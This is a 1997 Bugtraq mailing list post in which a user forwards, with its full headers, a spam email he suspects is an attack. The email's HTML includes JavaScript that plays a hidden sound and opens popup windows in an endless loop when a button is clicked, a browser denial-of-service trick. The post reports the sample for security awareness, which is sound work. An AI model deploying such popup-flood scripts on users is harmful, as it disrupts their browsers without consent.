Bugtraq mailing list archives
Another one javascript exploit attempt?
From: Andrew.V.Kovalev () JET MSK SU (Andrew V. Kovalev)
Date: Mon, 7 Apr 1997 13:55:00 +0400
Here is what I got from my mailbox today.. I use elm so I wasn't harmed but it seems that someone is attempting to launch an attack. To prevent damage I changed keyword "Javascript" to "ScriptoJav".. =====Cut here=====
From jet.msk.su!demos!kremvax.demos.su!hotmail.com!SuperSpammer Mon Apr 7 13:17:24 1997
Received: from jet.msk.su by jet.msk.su ; Mon, 7 Apr 97 13:17 MSD Received: from demos by jet.msk.su ; Mon, 7 Apr 97 13:17 MSD Received: by kremvax.demos.su (uumail v3.2.4/D) for avk () jet msk su; Sun, 6 Apr 1997 21:40:05 +0400 Received: by kremvax.demos.su (8.6.13/D) from mindlink.net [204.174.16.1] for <avk () jet msk su> with ESMTP id UAA26981; Sun, 6 Apr 1997 20:40:01 +0300 From: SuperSpammer () hotmail com Received: from tr74.mka.net [206.173.17.154] with smtp by rsoft.rsoft.bc.ca with smtp (Smail-3.2 1996-Jul-4 #1 #1) id m0wDv4j-001mqrC; Sun, 6 Apr 1997 09:45:53 -0700 (PDT) Message-Id: <m0wDv4j-001mqrC () rsoft rsoft bc ca> Date: Sun, 6 Apr 1997 09:45:53 -0700 (PDT) To: avk () jet msk su Subject: I'm not a spammer! Content-Type: text/html; charset=koi8-r Content-Length: 1239 Status: RO <HTML> <HEAD> </HEAD> <BODY TEXT="#FF0000" BGCOLOR="#000000" LINK="#0000EE" VLINK="#551A8B" ALINK="#FF0000"> <BASE HREF="http://www.idsoftware.com/"> <SCRIPT language="JavaScript"><!-- if(navigator.userAgent.indexOf("MSIE") != -1) document.writeln ('<bgsound src="beast.wav">');else document.writeln ('<embed src="beast.wav" autostart=true hidden=true>'); function Oops() { var Counter = 0 while (true) { window.open("http://www.netscape.com","Haha" + Counter,"width=22,height=22,resizable=no") Counter++ } }// --></SCRIPT> </P> <FORM method=post name="FormAction" action="mailto:"+"s-spammer () hotmail com"></P> <CENTER><TABLE BORDER=1 WIDTH="100%" HEIGHT="2000" BGCOLOR="#000000" > <TR> <TD> <CENTER><P>ñ ×ÁÍ ÎÅ ÓÐÁÍÍÅÒ...</P></CENTER> </TD> </TR> <TR> <TD> <CENTER><P><FONT SIZE=+1>ñ ×ÁÍ ÎÅ ÓÐÁÍÍÅÒ...</FONT></P></CENTER> </TD> </TR> <TR> <TD> <CENTER><P><FONT SIZE=+3>ñ ÷áí îå óðáííåò !</FONT></P></CENTER> </TD> </TR> <TR> <TD> <CENTER><P><B><FONT SIZE=+4>ñ -</FONT></B></P></CENTER> <CENTER><P><B><FONT SIZE=+4>óõðåòóðáííåò !</FONT></B></P></CENTER> </TD> </TR> </TABLE> <INPUT TYPE="button" value="Have a nice day :)" onClick="Oops()"></P> </CENTER> </BODY> </HTML> --
Current thread:
- Password problem in Trumpet Winsock. null (Apr 06)
- Linux - buffer overflow in filter Mikhail Iakovlev (Apr 06)
- Re: Password problem in Trumpet Winsock. John Sheehy (Apr 06)
- Re: Password problem in Trumpet Winsock. Michael Douglass (Apr 07)
- Netware + Win95 issue Lauri Laupmaa (Apr 07)
- Re: Netware + Win95 issue Paul Melson (Apr 08)
- Another one javascript exploit attempt? Andrew V. Kovalev (Apr 07)
- DUMP of NT system crash Vytautas Vysniauskas (Apr 07)
- Re: Password problem in Trumpet Winsock. Paul Melson (Apr 07)
- BoS: /etc/default/login LOCKOUT= creates arbitrary files (fwd) Illuminati Primus (Apr 07)
- Re: BoS: /etc/default/login LOCKOUT= creates arbitrary files (f Eugene Bradley (Apr 08)
- FreeBSD Security Advisory: FreeBSD-SA-97:03.sysinstall Aleph One (Apr 07)
- CERT Advisory CA-97.09 - Vulnerability in IMAP and POP Aleph One (Apr 07)
- [linux-security] amd 920824upl102 ignores the nodev option Aleph One (Apr 08)